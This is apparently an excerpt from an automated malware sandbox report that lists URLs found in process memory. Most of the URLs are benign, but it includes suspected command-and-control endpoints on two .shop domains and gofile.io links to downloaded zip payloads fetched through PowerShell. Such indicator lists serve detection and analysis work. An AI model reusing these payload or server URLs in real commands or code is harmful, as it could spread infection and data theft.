Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000001.00000000.1701590540.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B8F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9BA3C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9BA3C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: explorer.exe, 00000001.00000000.1701590540.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1699388658.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1699388658.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1696852215.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1696258763.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1699388658.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1699388658.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003385000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2641040146.000000000339A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2718535898.00000000033D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/
Source: BitLockerToGo.exe, 00000010.00000003.2735965343.00000000033D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/1
Source: BitLockerToGo.exe, 00000010.00000003.2735965343.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000002.2754629289.00000000033D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/K36
Source: BitLockerToGo.exe, 00000010.00000003.2686356498.00000000033D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/U$q
Source: BitLockerToGo.exe, 00000010.00000003.2686356498.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2693111350.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2718535898.00000000033D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/a
Source: BitLockerToGo.exe, 00000010.00000003.2735965343.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000002.2754629289.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000002.2751996058.0000000003377000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2686356498.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2569617085.000000000339A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2693111350.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003385000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000002.2751996058.0000000003385000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2718535898.00000000033D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/api
Source: BitLockerToGo.exe, 00000010.00000003.2569617085.000000000339A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003385000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/api-
Source: BitLockerToGo.exe, 00000010.00000003.2569617085.000000000339A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003385000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/api1
Source: BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/api5
Source: BitLockerToGo.exe, 00000010.00000003.2693111350.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2718535898.00000000033D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/apidows
Source: BitLockerToGo.exe, 00000010.00000002.2751996058.0000000003377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/apiple-sto:s
Source: BitLockerToGo.exe, 00000010.00000003.2686356498.00000000033D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/d3
Source: BitLockerToGo.exe, 00000010.00000003.2735965343.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2686356498.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2693111350.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2718535898.00000000033D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/ly3$
Source: BitLockerToGo.exe, 00000010.00000003.2718921758.00000000054AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop:443/api
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 0000000E.00000002.2701783399.000001B9C8FCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.2701783399.000001B9C8FCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.2701783399.000001B9C8FCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000001.00000000.1701590540.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9BA954000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: lm.exe, 00000014.00000003.2707939700.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2745784061.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/
Source: lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/)
Source: lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/E
Source: lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2885232265.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/N
Source: lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/T
Source: lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2885232265.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/V
Source: lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/a
Source: lm.exe, 00000014.00000002.3067577617.0000000003107000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2885591470.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2652802759.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/api
Source: lm.exe, 00000014.00000003.2884414259.0000000003107000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000002.3067577617.0000000003107000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/apiGwP
Source: lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/api_
Source: lm.exe, 00000014.00000003.2851808320.0000000003107000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/apicw4
Source: lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/f
Source: lm.exe, 00000014.00000003.2708630118.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2709067186.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707939700.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/ro
Source: lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2885232265.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/t
Source: lm.exe, 00000014.00000002.3064823525.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop:443/apiCLSID
Source: powershell.exe, 0000000E.00000002.2701783399.000001B9C8FCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000001.00000000.1701590540.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1701590540.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: 2D42.exe, 0000000A.00000002.2754935748.000001E002628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co
Source: 2D42.exe, 0000000A.00000002.2754935748.000001E002628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/mi
Source: 2D42.exe, 0000000A.00000002.2754935748.000001E0025A8000.00000004.00000800.00020000.00000000.sdmp, 2D42.exe, 0000000A.00000002.2754935748.000001E002628000.00000004.00000800.00020000.00000000.sdmp, 2D42.exe, 0000000A.00000002.2754935748.000001E0024F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/microgods/raw
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9BA61B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip
Source: BitLockerToGo.exe, 00000010.00000003.2570920749.0000000005500000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2653203058.0000000003206000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BitLockerToGo.exe, 00000010.00000003.2571390512.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2570920749.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2653203058.0000000003206000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2653936321.0000000003165000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2657215472.0000000003165000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: BitLockerToGo.exe, 00000010.00000003.2571390512.00000000054D2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2655706215.0000000003141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: BitLockerToGo.exe, 00000010.00000003.2571390512.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2570920749.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2653203058.0000000003206000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2653936321.0000000003165000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2657215472.0000000003165000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: BitLockerToGo.exe, 00000010.00000003.2571390512.00000000054D2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2655706215.0000000003141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1701590540.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1701590540.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
